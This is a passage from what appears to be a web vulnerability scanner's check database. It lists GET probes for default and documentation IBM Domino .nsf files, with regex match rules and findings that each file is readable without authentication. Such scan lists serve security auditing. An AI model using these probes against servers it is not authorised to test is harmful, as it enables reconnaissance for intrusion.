removed.\",\"\",\"\"\n\"007530\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/help/npn_admn.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This documentation database can be read without authentication. All default files should be removed.\",\"\",\"\"\n\"007531\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/help/npn_rn.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This documentation database can be read without authentication. All default files should be removed.\",\"\",\"\"\n\"007532\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/help/readmec.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This documentation database can be read without authentication. All default files should be removed.\",\"\",\"\"\n\"007533\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/help/readmes.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This documentation database can be read without authentication. All default files should be removed.\",\"\",\"\"\n\"007534\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/help/smhelp.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This documentation database can be read without authentication. All default files should be removed.\",\"\",\"\"\n\"007535\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/help/srvinst.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This documentation database can be read without authentication. All default files should be removed.\",\"\",\"\"\n\"007536\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/help4.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This documentation database can be read without authentication. All default files should be removed.\",\"\",\"\"\n\"007537\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/helpadmin.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This documentation database can be read without authentication. All default files should be removed.\",\"\",\"\"\n\"007538\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/helplt4.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This documentation database can be read without authentication. All default files should be removed.\",\"\",\"\"\n\"007539\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/internet.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This documentation database can be read without authentication. All default files should be removed.\",\"\",\"\"\n\"007540\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/javapg.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This documentation database can be read without authentication. All default files should be removed.\",\"\",\"\"\n\"007541\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/lccon.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This documentation database can be read without authentication. All default files should be removed.\",\"\",\"\"\n\"007542\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/migrate.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This documentation database can be read without authentication. All default files should be removed.\",\"\",\"\"\n\"007543\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/npn_admn.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This documentation database can be read without authentication. All default files should be removed.\",\"\",\"\"\n\"007544\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/npn_rn.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This documentation database can be read without authentication. All default files should be removed.\",\"\",\"\"\n\"007545\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/readmec.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This documentation database can be read without authentication. All default files should be removed.\",\"\",\"\"\n\"007546\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/readmes.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This documentation database can be read without authentication. All default files should be removed.\",\"\",\"\"\n\"007547\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/smhelp.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This documentation database can be read without authentication. All default files should be removed.\",\"\",\"\"\n\"007548\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/srvinst.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This documentation database can be read without authentication. All default files should be removed.\",\"\",\"\"\n\"007549\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/deslog.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007550\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/docdomguide.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007551\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/docdspug.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007552\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/dochelp4.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007553\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/dochelpadmin.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007554\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/dochelplt4.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007555\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/docinternet.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007556\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/docjavapg.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007557\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/doclccon.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007558\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/docmigrate.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007559\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/docnpn_admn.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007560\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/docnpn_rn.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007561\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/docreadmec.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007562\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/docreadmes.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007563\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/docsmhelp.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007564\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/docsrvinst.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007565\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/helpdomguide.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007566\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/helpdspug.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007567\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/helphelp4.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007568\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/helphelpadmin.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007569\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/helphelplt4.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007570\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/helpinternet.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007571\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/helpjavapg.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007572\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/helplccon.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007573\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/helpmigrate.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007574\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/helpnpn_admn.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007575\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/helpnpn_rn.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007576\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/helpreadmec.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007577\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/helpreadmes.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007578\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/helpsmhelp.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007579\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/helpsrvinst.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007580\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/iNotesForms5.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007581\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/quickplacequickplacemain.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007582\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/quickstartqstart50.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007583\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/quickstartwwsample.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007584\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/sample/siregw46.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007585\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/zmevladm.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007586\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/AgentRunner.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007587\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/doc/helpadmn.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007588\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/doc/svrinst.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007589\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/doc/wksinst.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007590\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/help/decsdoc.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007591\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/help/dols_help.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007592\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/help/help5_admin.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007593\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/help/help5_client.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007594\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/help/help5_designer.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007595\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/help/lsxlc.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007596\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/sample/faqw46.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007597\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/sample/framew46.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007598\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/stats675.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007599\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/loga4.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007600\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/qstart.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007601\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/mtabtbls.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007602\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/proghelp/KBCCV11.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive 